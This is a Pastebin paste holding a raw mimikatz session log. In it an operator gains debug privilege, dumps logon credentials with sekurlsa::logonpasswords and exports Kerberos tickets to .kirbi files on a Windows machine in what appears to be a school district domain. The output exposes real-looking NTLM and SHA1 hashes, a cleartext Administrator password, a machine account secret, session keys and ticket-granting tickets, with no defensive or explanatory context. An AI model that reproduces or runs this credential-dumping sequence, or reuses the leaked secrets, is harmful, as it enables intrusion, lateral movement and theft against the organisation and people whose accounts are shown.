API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 13th, 2015
901
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.88 KB | None | 0 0
raw download clone embed print report
  1. Using 'mimikatz.log' for logfile : OK
  2.  
  3. mimikatz # sekurlsa:logonpasswords
  4. ERROR mimikatz_doLocal ; "sekurlsa:logonpasswords" command of "standard" module not found !
  5.  
  6. Module : standard
  7. Full name : Standard module
  8. Description : Basic commands (does not require module name)
  9.  
  10. exit - Quit mimikatz
  11. cls - Clear screen (doesn't work with redirections, like PsExec)
  12. answer - Answer to the Ultimate Question of Life, the Universe, and Everything
  13. coffee - Please, make me a coffee!
  14. sleep - Sleep an amount of milliseconds
  15. log - Log mimikatz input/output to file
  16. base64 - Switch file output/base64 output
  17. version - Display some version informations
  18. cd - Change or display current directory
  19. markruss - Mark about PtH
  20.  
  21. mimikatz # privilege::debug
  22. Privilege '20' OK
  23.  
  24. mimikatz # sekurlsa:logonpasswords
  25. ERROR mimikatz_doLocal ; "sekurlsa:logonpasswords" command of "standard" module not found !
  26.  
  27. Module : standard
  28. Full name : Standard module
  29. Description : Basic commands (does not require module name)
  30.  
  31. exit - Quit mimikatz
  32. cls - Clear screen (doesn't work with redirections, like PsExec)
  33. answer - Answer to the Ultimate Question of Life, the Universe, and Everything
  34. coffee - Please, make me a coffee!
  35. sleep - Sleep an amount of milliseconds
  36. log - Log mimikatz input/output to file
  37. base64 - Switch file output/base64 output
  38. version - Display some version informations
  39. cd - Change or display current directory
  40. markruss - Mark about PtH
  41.  
  42. mimikatz # sekurlsa::logonpasswords
  43.  
  44. Authentication Id : 0 ; 12782747 (00000000:00c30c9b)
  45. Session : RemoteInteractive from 2
  46. User Name : Administrator
  47. Domain : 726-D112-E001
  48. Logon Server : 726-D112-E001
  49. Logon Time : 8/13/2015 1:06:48 PM
  50. SID : S-1-5-21-1952719802-2488220560-2310768500-500
  51. msv :
  52. [00010000] CredentialKeys
  53. * NTLM : a82731a503d4ccb4e8b3287a5748b9ab
  54. * SHA1 : 79367bbcb81b385c9ac13b92bf42639f0d68bc52
  55. [00000003] Primary
  56. * Username : Administrator
  57. * Domain : 726-D112-E001
  58. * NTLM : a82731a503d4ccb4e8b3287a5748b9ab
  59. * SHA1 : 79367bbcb81b385c9ac13b92bf42639f0d68bc52
  60. tspkg :
  61. wdigest :
  62. * Username : Administrator
  63. * Domain : 726-D112-E001
  64. * Password : picture*
  65. kerberos :
  66. * Username : Administrator
  67. * Domain : 726-D112-E001
  68. * Password : (null)
  69. ssp :
  70. credman :
  71.  
  72. Authentication Id : 0 ; 997 (00000000:000003e5)
  73. Session : Service from 0
  74. User Name : LOCAL SERVICE
  75. Domain : NT AUTHORITY
  76. Logon Server : (null)
  77. Logon Time : 8/13/2015 5:07:18 AM
  78. SID : S-1-5-19
  79. msv :
  80. tspkg :
  81. wdigest :
  82. * Username : (null)
  83. * Domain : (null)
  84. * Password : (null)
  85. kerberos :
  86. * Username : (null)
  87. * Domain : (null)
  88. * Password : (null)
  89. ssp :
  90. credman :
  91.  
  92. Authentication Id : 0 ; 996 (00000000:000003e4)
  93. Session : Service from 0
  94. User Name : 726-D112-E001$
  95. Domain : EMPLOYEES
  96. Logon Server : (null)
  97. Logon Time : 8/13/2015 5:07:18 AM
  98. SID : S-1-5-20
  99. msv :
  100. [00000003] Primary
  101. * Username : 726-D112-E001$
  102. * Domain : EMPLOYEES
  103. * NTLM : 6c1afe558fa44f1169bd0757dbe4a05a
  104. * SHA1 : 4dd669eb1a22780cfc09ca67a0b73409d18d25c5
  105. tspkg :
  106. wdigest :
  107. * Username : 726-D112-E001$
  108. * Domain : EMPLOYEES
  109. * Password : "_zhUrFukm-_074f32>:XftS4az@;/tVIMLk=iFbbu5eaG!c!L,T9kO;Rj4+5I=HkHu^9QTxUb[uLYn\,nFk8 THD'l@[email protected]>)qPH8i5PWn5(p*xW'l@b
  110. kerberos :
  111. * Username : 726-d112-e001$
  112. * Domain : EMPLOYEES.CISD.CONROEISD.LOC
  113. * Password : (null)
  114. ssp :
  115. credman :
  116.  
  117. Authentication Id : 0 ; 53193 (00000000:0000cfc9)
  118. Session : UndefinedLogonType from 0
  119. User Name : (null)
  120. Domain : (null)
  121. Logon Server : (null)
  122. Logon Time : 8/13/2015 5:07:17 AM
  123. SID :
  124. msv :
  125. [00000003] Primary
  126. * Username : 726-D112-E001$
  127. * Domain : EMPLOYEES
  128. * NTLM : 6c1afe558fa44f1169bd0757dbe4a05a
  129. * SHA1 : 4dd669eb1a22780cfc09ca67a0b73409d18d25c5
  130. tspkg :
  131. wdigest :
  132. kerberos :
  133. ssp :
  134. credman :
  135.  
  136. Authentication Id : 0 ; 999 (00000000:000003e7)
  137. Session : UndefinedLogonType from 0
  138. User Name : 726-D112-E001$
  139. Domain : EMPLOYEES
  140. Logon Server : (null)
  141. Logon Time : 8/13/2015 5:07:16 AM
  142. SID : S-1-5-18
  143. msv :
  144. tspkg :
  145. wdigest :
  146. * Username : 726-D112-E001$
  147. * Domain : EMPLOYEES
  148. * Password : "_zhUrFukm-_074f32>:XftS4az@;/tVIMLk=iFbbu5eaG!c!L,T9kO;Rj4+5I=HkHu^9QTxUb[uLYn\,nFk8 THD'l@[email protected]>)qPH8i5PWn5(p*xW'l@b
  149. kerberos :
  150. * Username : 726-d112-e001$
  151. * Domain : EMPLOYEES.CISD.CONROEISD.LOC
  152. * Password : (null)
  153. ssp :
  154. credman :
  155.  
  156. mimikatz # sekurlsa::tickets /export
  157.  
  158. Authentication Id : 0 ; 12782747 (00000000:00c30c9b)
  159. Session : RemoteInteractive from 2
  160. User Name : Administrator
  161. Domain : 726-D112-E001
  162. Logon Server : 726-D112-E001
  163. Logon Time : 8/13/2015 1:06:48 PM
  164. SID : S-1-5-21-1952719802-2488220560-2310768500-500
  165.  
  166. * Username : Administrator
  167. * Domain : 726-D112-E001
  168. * Password : (null)
  169.  
  170. Group 0 - Ticket Granting Service
  171.  
  172. Group 1 - Client Ticket ?
  173.  
  174. Group 2 - Ticket Granting Ticket
  175.  
  176. Authentication Id : 0 ; 997 (00000000:000003e5)
  177. Session : Service from 0
  178. User Name : LOCAL SERVICE
  179. Domain : NT AUTHORITY
  180. Logon Server : (null)
  181. Logon Time : 8/13/2015 5:07:18 AM
  182. SID : S-1-5-19
  183.  
  184. * Username : (null)
  185. * Domain : (null)
  186. * Password : (null)
  187.  
  188. Group 0 - Ticket Granting Service
  189.  
  190. Group 1 - Client Ticket ?
  191.  
  192. Group 2 - Ticket Granting Ticket
  193.  
  194. Authentication Id : 0 ; 996 (00000000:000003e4)
  195. Session : Service from 0
  196. User Name : 726-D112-E001$
  197. Domain : EMPLOYEES
  198. Logon Server : (null)
  199. Logon Time : 8/13/2015 5:07:18 AM
  200. SID : S-1-5-20
  201.  
  202. * Username : 726-d112-e001$
  203. * Domain : EMPLOYEES.CISD.CONROEISD.LOC
  204. * Password : (null)
  205.  
  206. Group 0 - Ticket Granting Service
  207. [00000000]
  208. Start/End/MaxRenew: 8/13/2015 9:07:14 AM ; 8/13/2015 3:07:30 PM ; 8/13/2015 3:07:30 PM
  209. Service Name (02) : cifs ; noblefin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  210. Target Name (02) : cifs ; noblefin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  211. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  212. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  213. Session Key : 0x00000012 - aes256_hmac
  214. 8a0eef6e77cf2bf4f3825224df21e04ee88bc2c474963d965b667465285d7498
  215. Ticket : 0x00000012 - aes256_hmac ; kvno = 20 [...]
  216. * Saved to file [0;3e4]-0-0-40a40000-726-D112-E001$@cifs-noblefin.employees.cisd.conroeisd.loc.kirbi !
  217. [00000001]
  218. Start/End/MaxRenew: 8/13/2015 5:22:30 AM ; 8/13/2015 3:07:30 PM ; 8/13/2015 3:07:30 PM
  219. Service Name (02) : cifs ; steelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  220. Target Name (02) : cifs ; steelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  221. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  222. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  223. Session Key : 0x00000012 - aes256_hmac
  224. c0bab5d0a38263eef473f44ac38726b92a74761a9477b88118f79d3bd069351a
  225. Ticket : 0x00000012 - aes256_hmac ; kvno = 69 [...]
  226. * Saved to file [0;3e4]-0-1-40a40000-726-D112-E001$@cifs-steelfin.employees.cisd.conroeisd.loc.kirbi !
  227. [00000002]
  228. Start/End/MaxRenew: 8/13/2015 5:07:30 AM ; 8/13/2015 3:07:30 PM ; 8/13/2015 3:07:30 PM
  229. Service Name (02) : cifs ; nickelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  230. Target Name (02) : cifs ; nickelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  231. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  232. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  233. Session Key : 0x00000012 - aes256_hmac
  234. 2029b46afbb82fbf976d64aad46b774c5691eea091f97321c63eece486829486
  235. Ticket : 0x00000012 - aes256_hmac ; kvno = 68 [...]
  236. * Saved to file [0;3e4]-0-2-40a40000-726-D112-E001$@cifs-nickelfin.employees.cisd.conroeisd.loc.kirbi !
  237. [00000003]
  238. Start/End/MaxRenew: 8/13/2015 5:07:30 AM ; 8/13/2015 3:07:30 PM ; 8/13/2015 3:07:30 PM
  239. Service Name (02) : ldap ; noblefin.employees.cisd.conroeisd.loc ; employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  240. Target Name (02) : ldap ; noblefin.employees.cisd.conroeisd.loc ; employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  241. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC ( EMPLOYEES.CISD.CONROEISD.LOC )
  242. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  243. Session Key : 0x00000012 - aes256_hmac
  244. 12131b41b669a3ddb36b903fbaf3d7f75281d3c179b71c338e671fcaddd44f79
  245. Ticket : 0x00000012 - aes256_hmac ; kvno = 20 [...]
  246. * Saved to file [0;3e4]-0-3-40a40000-726-D112-E001$@ldap-noblefin.employees.cisd.conroeisd.loc.kirbi !
  247.  
  248. Group 1 - Client Ticket ?
  249.  
  250. Group 2 - Ticket Granting Ticket
  251. [00000000]
  252. Start/End/MaxRenew: 8/13/2015 5:07:30 AM ; 8/13/2015 3:07:30 PM ; 8/13/2015 3:07:30 PM
  253. Service Name (02) : krbtgt ; EMPLOYEES.CISD.CONROEISD.LOC ; @ EMPLOYEES.CISD.CONROEISD.LOC
  254. Target Name (--) : @ EMPLOYEES.CISD.CONROEISD.LOC
  255. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC ( $$Delegation Ticket$$ )
  256. Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ;
  257. Session Key : 0x00000012 - aes256_hmac
  258. 72bf56fa0495353d0d2ed9a0407334adc15d422ebbb2ce86bdacab67b18d7242
  259. Ticket : 0x00000017 - rc4_hmac_nt ; kvno = 2 [...]
  260. * Saved to file [0;3e4]-2-0-60a00000-726-D112-E001$@krbtgt-EMPLOYEES.CISD.CONROEISD.LOC.kirbi !
  261. [00000001]
  262. Start/End/MaxRenew: 8/13/2015 5:07:30 AM ; 8/13/2015 3:07:30 PM ; 8/13/2015 3:07:30 PM
  263. Service Name (02) : krbtgt ; EMPLOYEES.CISD.CONROEISD.LOC ; @ EMPLOYEES.CISD.CONROEISD.LOC
  264. Target Name (02) : krbtgt ; employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  265. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC ( employees.cisd.conroeisd.loc )
  266. Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
  267. Session Key : 0x00000012 - aes256_hmac
  268. 72040beb45fe039abae71e8ba33b32683ef5339a23c3bc3dc3b306ec2b986731
  269. Ticket : 0x00000017 - rc4_hmac_nt ; kvno = 2 [...]
  270. * Saved to file [0;3e4]-2-1-40e00000-726-D112-E001$@krbtgt-EMPLOYEES.CISD.CONROEISD.LOC.kirbi !
  271.  
  272. Authentication Id : 0 ; 999 (00000000:000003e7)
  273. Session : UndefinedLogonType from 0
  274. User Name : 726-D112-E001$
  275. Domain : EMPLOYEES
  276. Logon Server : (null)
  277. Logon Time : 8/13/2015 5:07:16 AM
  278. SID : S-1-5-18
  279.  
  280. * Username : 726-d112-e001$
  281. * Domain : EMPLOYEES.CISD.CONROEISD.LOC
  282. * Password : (null)
  283.  
  284. Group 0 - Ticket Granting Service
  285. [00000000]
  286. Start/End/MaxRenew: 8/13/2015 5:07:49 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  287. Service Name (02) : cifs ; steelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  288. Target Name (02) : cifs ; steelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  289. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  290. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  291. Session Key : 0x00000012 - aes256_hmac
  292. b0e07003ac9276dcb42136d23d8576d23d5fbb0d4fa1bccda9357e0df8ba89ac
  293. Ticket : 0x00000012 - aes256_hmac ; kvno = 69 [...]
  294. * Saved to file [0;3e7]-0-0-40a40000-726-D112-E001$@cifs-steelfin.employees.cisd.conroeisd.loc.kirbi !
  295. [00000001]
  296. Start/End/MaxRenew: 8/13/2015 5:07:47 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  297. Service Name (02) : cifs ; Cobaltfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  298. Target Name (02) : cifs ; Cobaltfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  299. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  300. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  301. Session Key : 0x00000012 - aes256_hmac
  302. c12f85f61546b26924b0561c189da7eb148768433fb8a1796632c126ccae7dc7
  303. Ticket : 0x00000012 - aes256_hmac ; kvno = 69 [...]
  304. * Saved to file [0;3e7]-0-1-40a40000-726-D112-E001$@cifs-Cobaltfin.employees.cisd.conroeisd.loc.kirbi !
  305. [00000002]
  306. Start/End/MaxRenew: 8/13/2015 5:07:47 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  307. Service Name (02) : cifs ; noblefin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  308. Target Name (02) : cifs ; noblefin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  309. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  310. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  311. Session Key : 0x00000012 - aes256_hmac
  312. 4e7fc38a23f841755a99582e33e2f5ce92d7d8626155b5256f5e5b3c8e191220
  313. Ticket : 0x00000012 - aes256_hmac ; kvno = 20 [...]
  314. * Saved to file [0;3e7]-0-2-40a40000-726-D112-E001$@cifs-noblefin.employees.cisd.conroeisd.loc.kirbi !
  315. [00000003]
  316. Start/End/MaxRenew: 8/13/2015 5:07:47 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  317. Service Name (02) : cifs ; nickelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  318. Target Name (02) : cifs ; nickelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  319. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  320. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  321. Session Key : 0x00000012 - aes256_hmac
  322. 72b4dbdeca053c24d04eceb357ceb73dc5f426ac85b75afa9e0c57cf82c95ac6
  323. Ticket : 0x00000012 - aes256_hmac ; kvno = 68 [...]
  324. * Saved to file [0;3e7]-0-3-40a40000-726-D112-E001$@cifs-nickelfin.employees.cisd.conroeisd.loc.kirbi !
  325. [00000004]
  326. Start/End/MaxRenew: 8/13/2015 5:07:47 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  327. Service Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  328. Target Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  329. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  330. Flags 40a00000 : pre_authent ; renewable ; forwardable ;
  331. Session Key : 0x00000012 - aes256_hmac
  332. b0c9fd7b59ff7e97a85b25e9a82c4888cdb80d1b528a800f6dba9e03fdabf4e5
  333. Ticket : 0x00000012 - aes256_hmac ; kvno = 1 [...]
  334. * Saved to file [0;3e7]-0-4-40a00000.kirbi !
  335. [00000005]
  336. Start/End/MaxRenew: 8/13/2015 5:07:47 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  337. Service Name (02) : ldap ; steelfin.employees.cisd.conroeisd.loc ; employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  338. Target Name (02) : ldap ; steelfin.employees.cisd.conroeisd.loc ; employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  339. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC ( EMPLOYEES.CISD.CONROEISD.LOC )
  340. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  341. Session Key : 0x00000012 - aes256_hmac
  342. d67db9f32762ba0233e9c7f40b4b5d533b2cf6201e435374985f4137b3556b63
  343. Ticket : 0x00000012 - aes256_hmac ; kvno = 69 [...]
  344. * Saved to file [0;3e7]-0-5-40a40000-726-D112-E001$@ldap-steelfin.employees.cisd.conroeisd.loc.kirbi !
  345. [00000006]
  346. Start/End/MaxRenew: 8/13/2015 5:07:35 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  347. Service Name (02) : ldap ; noblefin.employees.cisd.conroeisd.loc ; employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  348. Target Name (02) : ldap ; noblefin.employees.cisd.conroeisd.loc ; employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  349. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC ( EMPLOYEES.CISD.CONROEISD.LOC )
  350. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  351. Session Key : 0x00000012 - aes256_hmac
  352. 74d7206e18aa9589f301a4142741e8d4fef025c3a7e9fa2510e773c33dc37ce6
  353. Ticket : 0x00000012 - aes256_hmac ; kvno = 20 [...]
  354. * Saved to file [0;3e7]-0-6-40a40000-726-D112-E001$@ldap-noblefin.employees.cisd.conroeisd.loc.kirbi !
  355. [00000007]
  356. Start/End/MaxRenew: 8/13/2015 5:07:29 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  357. Service Name (02) : LDAP ; steelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  358. Target Name (02) : LDAP ; steelfin.employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  359. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC
  360. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  361. Session Key : 0x00000012 - aes256_hmac
  362. 73421aa09f9ec94426dce18b5f9652958ff551844dbb1184d3f9160dc71ce1ba
  363. Ticket : 0x00000012 - aes256_hmac ; kvno = 69 [...]
  364. * Saved to file [0;3e7]-0-7-40a40000-726-D112-E001$@LDAP-steelfin.employees.cisd.conroeisd.loc.kirbi !
  365. [00000008]
  366. Start/End/MaxRenew: 8/13/2015 5:07:29 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  367. Service Name (02) : LDAP ; nickelfin.employees.cisd.conroeisd.loc ; employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  368. Target Name (02) : LDAP ; nickelfin.employees.cisd.conroeisd.loc ; employees.cisd.conroeisd.loc ; @ EMPLOYEES.CISD.CONROEISD.LOC
  369. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC ( EMPLOYEES.CISD.CONROEISD.LOC )
  370. Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;
  371. Session Key : 0x00000012 - aes256_hmac
  372. dcf49f337f0c79228f509b8b6487f4d3d156647d9d2da93b110081f347c2ca2e
  373. Ticket : 0x00000012 - aes256_hmac ; kvno = 68 [...]
  374. * Saved to file [0;3e7]-0-8-40a40000-726-D112-E001$@LDAP-nickelfin.employees.cisd.conroeisd.loc.kirbi !
  375.  
  376. Group 1 - Client Ticket ?
  377.  
  378. Group 2 - Ticket Granting Ticket
  379. [00000000]
  380. Start/End/MaxRenew: 8/13/2015 5:07:47 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  381. Service Name (02) : krbtgt ; EMPLOYEES.CISD.CONROEISD.LOC ; @ EMPLOYEES.CISD.CONROEISD.LOC
  382. Target Name (--) : @ EMPLOYEES.CISD.CONROEISD.LOC
  383. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC ( $$Delegation Ticket$$ )
  384. Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ;
  385. Session Key : 0x00000012 - aes256_hmac
  386. e54f7ed0fb6e49e15fe5dcf0a22db8ec15fd3d1a8d1357f20e6033d36dae50b6
  387. Ticket : 0x00000017 - rc4_hmac_nt ; kvno = 2 [...]
  388. * Saved to file [0;3e7]-2-0-60a00000-726-D112-E001$@krbtgt-EMPLOYEES.CISD.CONROEISD.LOC.kirbi !
  389. [00000001]
  390. Start/End/MaxRenew: 8/13/2015 5:07:29 AM ; 8/13/2015 3:07:29 PM ; 8/13/2015 3:07:29 PM
  391. Service Name (02) : krbtgt ; EMPLOYEES.CISD.CONROEISD.LOC ; @ EMPLOYEES.CISD.CONROEISD.LOC
  392. Target Name (02) : krbtgt ; EMPLOYEES.CISD.CONROEISD.LOC ; @ EMPLOYEES.CISD.CONROEISD.LOC
  393. Client Name (01) : 726-D112-E001$ ; @ EMPLOYEES.CISD.CONROEISD.LOC ( EMPLOYEES.CISD.CONROEISD.LOC )
  394. Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
  395. Session Key : 0x00000012 - aes256_hmac
  396. 63ca3203f1e98fc4bcd20ab04323d87d3652545fc4e613eabe8c178def43161d
  397. Ticket : 0x00000017 - rc4_hmac_nt ; kvno = 2 [...]
  398. * Saved to file [0;3e7]-2-1-40e00000-726-D112-E001$@krbtgt-EMPLOYEES.CISD.CONROEISD.LOC.kirbi !
  399.  
  400. mimikatz #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!